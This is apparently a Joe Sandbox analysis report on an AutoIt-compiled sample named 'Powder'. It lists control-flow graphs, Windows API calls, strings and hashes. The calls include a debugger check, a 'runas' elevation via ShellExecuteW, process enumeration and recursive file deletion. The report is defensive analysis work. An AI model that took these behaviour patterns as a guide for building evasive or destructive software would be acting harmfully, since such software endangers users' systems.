101158 e142cf CloseHandle 101156->101158 101157->100978 101159 e0d766 101158->101159 101159->101157 101221 e13f0b CloseHandle 101159->101221 101161->100995 101162->100995 101163->100978 101164->100947 101165->100944 101166->100954 101167->100970 101168->100972 101169->100947 101170->100947 101171->100978 101172->100982 101173->100996 101174->101000 101175->100950 101176->100996 101177->100950 101178->100950 101179->100996 101180->100996 101181->101019 101182->101051 101183->101051 101184->101070 101185->101070 101187 e11a36 59 API calls 101186->101187 101188 e71ad1 101187->101188 101189 e11a36 59 API calls 101188->101189 101190 e71adc 101189->101190 101192 e3dd2b 101191->101192 101193 e04fa8 101191->101193 101194 e3dd3c 101192->101194 101196 e11821 59 API calls 101192->101196 101198 e20fe6 Mailbox 59 API calls 101193->101198 101195 e119e1 59 API calls 101194->101195 101197 e3dd46 101195->101197 101196->101194 101201 e11207 59 API calls 101197->101201 101203 e04fd4 101197->101203 101199 e04fbb 101198->101199 101199->101197 101200 e04fc6 101199->101200 101202 e11a36 59 API calls 101200->101202 101200->101203 101201->101203 101202->101203 101203->101125 101203->101127 101205 e1410a 2 API calls 101204->101205 101206 e141f7 101205->101206 101207 e1410a 2 API calls 101206->101207 101208 e1420b 101207->101208 101208->101142 101210 e67c8a 101209->101210 101211 e20fe6 Mailbox 59 API calls 101210->101211 101212 e67c91 101211->101212 101213 e67cbe 101212->101213 101214 e67c9d 101212->101214 101215 e20fe6 Mailbox 59 API calls 101213->101215 101216 e20fe6 Mailbox 59 API calls 101214->101216 101217 e67ca6 _memset 101215->101217 101216->101217 101217->101155 101218->101128 101219->101153 101220->101156 101221->101157 101222->101127 101223->101127 101224 e01016 101229 e15ce7 101224->101229 101227 e22f70 __cinit 67 API calls 101228 e01025 101227->101228 101230 e20fe6 Mailbox 59 API calls 101229->101230 101231 e15cef 101230->101231 101232 e0101b 101231->101232 101236 e15f39 101231->101236 101232->101227 101237 e15f42 101236->101237 101239 e15cfb 101236->101239 101238 e22f70 __cinit 67 API calls 101237->101238 101238->101239 101240 e15d13 101239->101240 101241 e11207 59 API calls 101240->101241 101242 e15d2b GetVersionExW 101241->101242 101243 e11821 59 API calls 101242->101243 101244 e15d6e 101243->101244 101245 e11981 59 API calls 101244->101245 101254 e15d9b 101244->101254 101246 e15d8f 101245->101246 101247 e1133d 59 API calls 101246->101247 101247->101254 101248 e15e00 GetCurrentProcess IsWow64Process 101249 e15e19 101248->101249 101251 e15e98 GetSystemInfo 101249->101251 101252 e15e2f 101249->101252 101250 e51098 101253 e15e65 101251->101253 101264 e155f0 101252->101264 101253->101232 101254->101248 101254->101250 101257 e15e41 101260 e155f0 2 API calls 101257->101260 101258 e15e8c GetSystemInfo 101259 e15e56 101258->101259 101259->101253 101261 e15e5c FreeLibrary 101259->101261 101262 e15e49 GetNativeSystemInfo 101260->101262 101261->101253 101262->101259 101265 e15619 101264->101265 101266 e155f9 LoadLibraryA 101264->101266 101265->101257 101265->101258 101266->101265 101267 e1560a GetProcAddress 101266->101267 101267->101265 101268 e401f8 101269 e401fa 101268->101269 101272 e64d18 SHGetFolderPathW 101269->101272 101273 e11821 59 API calls 101272->101273 101274 e40203 101273->101274 101275 e0107d 101280 e12fc5 101275->101280 101277 e0108c 101278 e22f70 __cinit 67 API calls 101277->101278 101279 e01096 101278->101279 101281 e12fd5 __ftell_nolock 101280->101281 101282 e11207 59 API calls 101281->101282 101283 e1308b 101282->101283 101284 e200cf 61 API calls 101283->101284 101285 e13094 101284->101285 101311 e208c1 101285->101311 101288 e11900 59 API calls 101289 e130ad 101288->101289 101290 e14c94 59 API calls 101289->101290 101291 e130bc 101290->101291 101292 e11207 59 API calls 101291->101292 101293 e130c5 101292->101293 101294 e119e1 59 API calls 101293->101294 101295 e130ce RegOpenKeyExW 101294->101295 101296 e501a3 RegQueryValueExW 101295->101296 101302 e130f0 Mailbox 101295->101302 101297 e50235 RegCloseKey 101296->101297 101298 e501c0 101296->101298 101297->101302 101309 e50247 _wcscat Mailbox __wsetenvp 101297->101309 101299 e20fe6 Mailbox 59 API calls 101298->101299 101300 e501d9 101299->101300 101301 e1433f 59 API calls 101300->101301 101303 e501e4 RegQueryValueExW 101301->101303 101302->101277 101304 e50201 101303->101304 101306 e5021b 101303->101306 101305 e11821 59 API calls 101304->101305 101305->101306 101306->101297 101307 e11a36 59 API calls 101307->101309 101308 e14c94 59 API calls 101308->101309 101309->101302 101309->101307 101309->101308 101310 e11609 59 API calls 101309->101310 101310->101309 101312 e31b70 __ftell_nolock 101311->101312 101313 e208ce GetFullPathNameW 101312->101313 101314 e208f0 101313->101314 101315 e11821 59 API calls 101314->101315 101316 e1309f 101315->101316 101316->101288

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00E1526C
                                                  • IsDebuggerPresent.KERNEL32 ref: 00E1527E
                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 00E152E6
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                    • Part of subcall function 00E0BBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E0BC07
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E15366
                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00E50B2E
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00E50B66
                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00EB6D10), ref: 00E50BE9
                                                  • ShellExecuteW.SHELL32(00000000), ref: 00E50BF0
                                                    • Part of subcall function 00E1514C: GetSysColorBrush.USER32(0000000F), ref: 00E15156
                                                    • Part of subcall function 00E1514C: LoadCursorW.USER32(00000000,00007F00), ref: 00E15165
                                                    • Part of subcall function 00E1514C: LoadIconW.USER32(00000063), ref: 00E1517C
                                                    • Part of subcall function 00E1514C: LoadIconW.USER32(000000A4), ref: 00E1518E
                                                    • Part of subcall function 00E1514C: LoadIconW.USER32(000000A2), ref: 00E151A0
                                                    • Part of subcall function 00E1514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00E151C6
                                                    • Part of subcall function 00E1514C: RegisterClassExW.USER32(?), ref: 00E1521C
                                                    • Part of subcall function 00E150DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00E15109
                                                    • Part of subcall function 00E150DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00E1512A
                                                    • Part of subcall function 00E150DB: ShowWindow.USER32(00000000), ref: 00E1513E
                                                    • Part of subcall function 00E150DB: ShowWindow.USER32(00000000), ref: 00E15147
                                                    • Part of subcall function 00E159D3: _memset.LIBCMT ref: 00E159F9
                                                    • Part of subcall function 00E159D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00E15A9E
                                                  Strings
                                                  • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00E50B28
                                                  • runas, xrefs: 00E50BE4
                                                  • AutoIt, xrefs: 00E50B23
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                  • API String ID: 529118366-2030392706
                                                  • Opcode ID: 59adcbf059a26b41003bcbe050b5b3920eda4a31d3af32604e6bc7b0a85f0a8c
                                                  • Instruction ID: 4cdd4734b92a714242e43cdb61ee6196fca9fcb0ebdf4f9453e205ab3ffa3bbe
                                                  • Opcode Fuzzy Hash: 59adcbf059a26b41003bcbe050b5b3920eda4a31d3af32604e6bc7b0a85f0a8c
                                                  • Instruction Fuzzy Hash: D951FA72904248EECF05ABB1DC46EEDBBB4AF45384F1420AAF56173172DA710589CB21

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1036 e63ce2-e63d48 call e11207 * 4 call e20284 * 2 call e64f82 call e64fec 1053 e63d53-e63d5d call e64fec 1036->1053 1054 e63d4a-e63d4e call e11900 1036->1054 1058 e63d5f-e63d63 call e11900 1053->1058 1059 e63d68-e63da6 call e11207 * 2 call e20119 FindFirstFileW 1053->1059 1054->1053 1058->1059 1067 e63eb4-e63ebb FindClose 1059->1067 1068 e63dac 1059->1068 1070 e63ebe-e63ef6 call e11cb6 * 6 1067->1070 1069 e63db2-e63db4 1068->1069 1069->1067 1071 e63dba-e63dc1 1069->1071 1074 e63dc7-e63e1f call e11a36 call e64561 call e11cb6 call e11c9c call e117e0 call e11900 call e6412a 1071->1074 1075 e63e88-e63e9b FindNextFileW 1071->1075 1101 e63e40-e63e44 1074->1101 1102 e63e21-e63e24 1074->1102 1075->1069 1078 e63ea1-e63ea6 1075->1078 1078->1069 1105 e63e46-e63e49 1101->1105 1106 e63e72-e63e78 call e63ef7 1101->1106 1103 e63e2a-e63e3c call e1151f 1102->1103 1104 e63eab-e63eb2 FindClose 1102->1104 1111 e63e4e-e63e57 MoveFileW 1103->1111 1117 e63e3e DeleteFileW 1103->1117 1104->1070 1109 e63e4b 1105->1109 1110 e63e59-e63e69 call e63ef7 1105->1110 1113 e63e7d 1106->1113 1109->1111 1110->1104 1118 e63e6b-e63e70 DeleteFileW 1110->1118 1115 e63e80-e63e82 1111->1115 1113->1115 1115->1104 1119 e63e84 1115->1119 1117->1101 1118->1115 1119->1075
                                                  APIs
                                                    • Part of subcall function 00E20284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E12A58,?,00008000), ref: 00E202A4
                                                    • Part of subcall function 00E64FEC: GetFileAttributesW.KERNEL32(?,00E63BFE), ref: 00E64FED
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E63D96
                                                  • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E63E3E
                                                  • MoveFileW.KERNEL32(?,?), ref: 00E63E51
                                                  • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 00E63E6E
                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E63E90
                                                  • FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E63EAC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 4002782344-1173974218
                                                  • Opcode ID: 01b42dd954dac82351029e7f93d122ccd4794219a45fa49b1eacf82d214a708f
                                                  • Instruction ID: 6b3ec2ea671eb6b7cf0825151c8ff1fd90331c99b90ae03ac1a19e15cdce75ee
                                                  • Opcode Fuzzy Hash: 01b42dd954dac82351029e7f93d122ccd4794219a45fa49b1eacf82d214a708f
                                                  • Instruction Fuzzy Hash: 6051847184120DAECF15EBB0D9929EDB7B9AF11344F6021AAE542B3192DF316F4DCB60

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1202 e15d13-e15d73 call e11207 GetVersionExW call e11821 1207 e15d79 1202->1207 1208 e15e78-e15e7a 1202->1208 1210 e15d7c-e15d81 1207->1210 1209 e50fa9-e50fb5 1208->1209 1211 e50fb6-e50fba 1209->1211 1212 e15d87 1210->1212 1213 e15e7f-e15e80 1210->1213 1215 e50fbd-e50fc9 1211->1215 1216 e50fbc 1211->1216 1214 e15d88-e15dbf call e11981 call e1133d 1212->1214 1213->1214 1225 e15dc5-e15dc6 1214->1225 1226 e51098-e5109b 1214->1226 1215->1211 1217 e50fcb-e50fd0 1215->1217 1216->1215 1217->1210 1219 e50fd6-e50fdd 1217->1219 1219->1209 1221 e50fdf 1219->1221 1224 e50fe4-e50fea 1221->1224 1227 e15e00-e15e17 GetCurrentProcess IsWow64Process 1224->1227 1228 e50fef-e50ffa 1225->1228 1229 e15dcc-e15dcf 1225->1229 1230 e510b4-e510b8 1226->1230 1231 e5109d 1226->1231 1236 e15e19 1227->1236 1237 e15e1c-e15e2d 1227->1237 1232 e51017-e51019 1228->1232 1233 e50ffc-e51002 1228->1233 1229->1227 1234 e15dd1-e15def 1229->1234 1238 e510a3-e510ac 1230->1238 1239 e510ba-e510c3 1230->1239 1235 e510a0 1231->1235 1243 e5103c-e5103f 1232->1243 1244 e5101b-e51027 1232->1244 1240 e51004-e51007 1233->1240 1241 e5100c-e51012 1233->1241 1234->1227 1242 e15df1-e15df7 1234->1242 1235->1238 1236->1237 1246 e15e98-e15ea2 GetSystemInfo 1237->1246 1247 e15e2f-e15e3f call e155f0 1237->1247 1238->1230 1239->1235 1245 e510c5-e510c8 1239->1245 1240->1227 1241->1227 1242->1224 1248 e15dfd 1242->1248 1252 e51065-e51068 1243->1252 1253 e51041-e51050 1243->1253 1249 e51031-e51037 1244->1249 1250 e51029-e5102c 1244->1250 1245->1238 1251 e15e65-e15e75 1246->1251 1259 e15e41-e15e4e call e155f0 1247->1259 1260 e15e8c-e15e96 GetSystemInfo 1247->1260 1248->1227 1249->1227 1250->1227 1252->1227 1258 e5106e-e51083 1252->1258 1255 e51052-e51055 1253->1255 1256 e5105a-e51060 1253->1256 1255->1227 1256->1227 1261 e51085-e51088 1258->1261 1262 e5108d-e51093 1258->1262 1267 e15e50-e15e54 GetNativeSystemInfo 1259->1267 1268 e15e85-e15e8a 1259->1268 1263 e15e56-e15e5a 1260->1263 1261->1227 1262->1227 1263->1251 1265 e15e5c-e15e5f FreeLibrary 1263->1265 1265->1251 1267->1263 1268->1267
                                                  APIs
                                                  • GetVersionExW.KERNEL32(?), ref: 00E15D40
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                  • GetCurrentProcess.KERNEL32(?,00E90A18,00000000,00000000,?), ref: 00E15E07
                                                  • IsWow64Process.KERNEL32(00000000), ref: 00E15E0E
                                                  • GetNativeSystemInfo.KERNEL32(00000000), ref: 00E15E54
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00E15E5F
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00E15E90
                                                  • GetSystemInfo.KERNEL32(00000000), ref: 00E15E9C
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                  • String ID:
                                                  • API String ID: 1986165174-0
                                                  • Opcode ID: 9749750de60f7233aa08a9bd9f172e9314634b0f9710e6c2048f8cb8d94341a6
                                                  • Instruction ID: 86d62b2c30b699ffd643d66821641646366af9a1a719df1a71778be1fea1e20f
                                                  • Opcode Fuzzy Hash: 9749750de60f7233aa08a9bd9f172e9314634b0f9710e6c2048f8cb8d94341a6
                                                  • Instruction Fuzzy Hash: 2A91C532949BC0DEC731CB7894505EBBFE56F69305B885E9ED0C7A3A41D230A58CC769

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 1269 e64005-e6404c call e11207 * 3 call e20284 call e64fec 1280 e6404e-e64057 call e11900 1269->1280 1281 e6405c-e6408d call e20119 FindFirstFileW 1269->1281 1280->1281 1285 e6408f-e64091 1281->1285 1286 e640fc-e64103 FindClose 1281->1286 1285->1286 1288 e64093-e64098 1285->1288 1287 e64107-e64129 call e11cb6 * 3 1286->1287 1290 e640d7-e640e9 FindNextFileW 1288->1290 1291 e6409a-e640d5 call e11c9c call e117e0 call e11900 DeleteFileW 1288->1291 1290->1285 1292 e640eb-e640f1 1290->1292 1291->1290 1304 e640f3-e640fa FindClose 1291->1304 1292->1285 1304->1287
                                                  APIs
                                                    • Part of subcall function 00E20284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E12A58,?,00008000), ref: 00E202A4
                                                    • Part of subcall function 00E64FEC: GetFileAttributesW.KERNEL32(?,00E63BFE), ref: 00E64FED
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E6407C
                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00E640CC
                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00E640DD
                                                  • FindClose.KERNEL32(00000000), ref: 00E640F4
                                                  • FindClose.KERNEL32(00000000), ref: 00E640FD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 2649000838-1173974218
                                                  • Opcode ID: 76ba451b8d7c9df0e8ae56cb5b7ff700fe067a176d1ab2dcc9c7dbe954ada514
                                                  • Instruction ID: 923a8dae253975af3b2109f585deb4cbe511148eb34ac0755ddd796936590ce9
                                                  • Opcode Fuzzy Hash: 76ba451b8d7c9df0e8ae56cb5b7ff700fe067a176d1ab2dcc9c7dbe954ada514
                                                  • Instruction Fuzzy Hash: 3B31A1710483559FC345EB60D8918EFB7ECBE91344F442A5EF5E1A21E2DB209A0DC7A3
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00E6416D
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00E6417B
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00E6419B
                                                  • CloseHandle.KERNEL32(00000000), ref: 00E64245
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                  • String ID:
                                                  • API String ID: 420147892-0
                                                  • Opcode ID: 370c3fa582f86dc69f59ae73df7d2ebf1238d1f3086e97996a7f8021c206a318
                                                  • Instruction ID: cf6c307717b97f3addc5c40195a5049653080612c0611336e4693591de1dd171
                                                  • Opcode Fuzzy Hash: 370c3fa582f86dc69f59ae73df7d2ebf1238d1f3086e97996a7f8021c206a318
                                                  • Instruction Fuzzy Hash: FB31D6711083019FD300DF50E895AEFBBE8BF95344F50152EF685E21E1EB709989CB92
                                                  APIs
                                                    • Part of subcall function 00E13740: CharUpperBuffW.USER32(?,00EC71DC,00000000,?,00000000,00EC71DC,?,00E053A5,?,?,?,?), ref: 00E1375D
                                                  • _memmove.LIBCMT ref: 00E0B68A
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper_memmove
                                                  • String ID:
                                                  • API String ID: 2819905725-0
                                                  • Opcode ID: 71e61f7b82ad84a5e2960414297d770187764f47a94a2ed7f6d86b9cc16b3763
                                                  • Instruction ID: 7237550d654d8553399500c0fd57cbb308a1b3dc6b246a0249b577695bb38caf
                                                  • Opcode Fuzzy Hash: 71e61f7b82ad84a5e2960414297d770187764f47a94a2ed7f6d86b9cc16b3763
                                                  • Instruction Fuzzy Hash: 14A27B706083419FD724CF24D480B6AB7E1FF84304F14A96DE89AAB3A1D775ED85CB92
                                                  APIs
                                                  • GetFileAttributesW.KERNEL32(?,00E4FC86), ref: 00E6495A
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00E6496B
                                                  • FindClose.KERNEL32(00000000), ref: 00E6497B
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: FileFind$AttributesCloseFirst
                                                  • String ID:
                                                  • API String ID: 48322524-0
                                                  • Opcode ID: 076804ced08af52a458d8bd8b7d26309d3ca95e09bcf316fd9fb9eab3a849b30
                                                  • Instruction ID: 731aab322ad5516bf6455cf57c5d42d7ae5ff3ae4d9fbc0a30eed14797c3e25c
                                                  • Opcode Fuzzy Hash: 076804ced08af52a458d8bd8b7d26309d3ca95e09bcf316fd9fb9eab3a849b30
                                                  • Instruction Fuzzy Hash: 9BE0D8714915069F43106739FC0D4EA776CDF46379F500B07F535E10E0E77099484795
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 37debc1700e7dc3dabfe5b8371dc44f24f6da5634b39824b5ef009be5b22997b
                                                  • Instruction ID: 894aa6d4570d637b712c27dde39399a6e3c057129637bc84b3e1cb14821a6465
                                                  • Opcode Fuzzy Hash: 37debc1700e7dc3dabfe5b8371dc44f24f6da5634b39824b5ef009be5b22997b
                                                  • Instruction Fuzzy Hash: 7422AC70A00216CFDB14DF54D880AAEB7F0FF45304F14916AE956BB393E771A981CBA1
                                                  APIs
                                                  • timeGetTime.WINMM ref: 00E0BF57
                                                    • Part of subcall function 00E052B0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E052E6
                                                  • Sleep.KERNEL32(0000000A,?,?), ref: 00E436B5
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: MessagePeekSleepTimetime
                                                  • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$CALL
                                                  • API String ID: 1792118007-922114024
                                                  • Opcode ID: 9a284d574e466d78dd2a417efc6397e963de1994bc8f52ec5138d9c5b3614332
                                                  • Instruction ID: 90cbffbe6c0e40e339349711a70b2d1b7b55ceabef24abdffa103dab3d5f12ea
                                                  • Opcode Fuzzy Hash: 9a284d574e466d78dd2a417efc6397e963de1994bc8f52ec5138d9c5b3614332
                                                  • Instruction Fuzzy Hash: 32C2BE70608341DFD728DF24D884BAAB7E5BF84304F14691DF59AB72A1CB71E985CB82

                                                  Control-flow Graph

                                                  APIs
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00E03444
                                                  • RegisterClassExW.USER32(00000030), ref: 00E0346E
                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00E0347F
                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00E0349C
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00E034AC
                                                  • LoadIconW.USER32(000000A9), ref: 00E034C2
                                                  • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00E034D1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
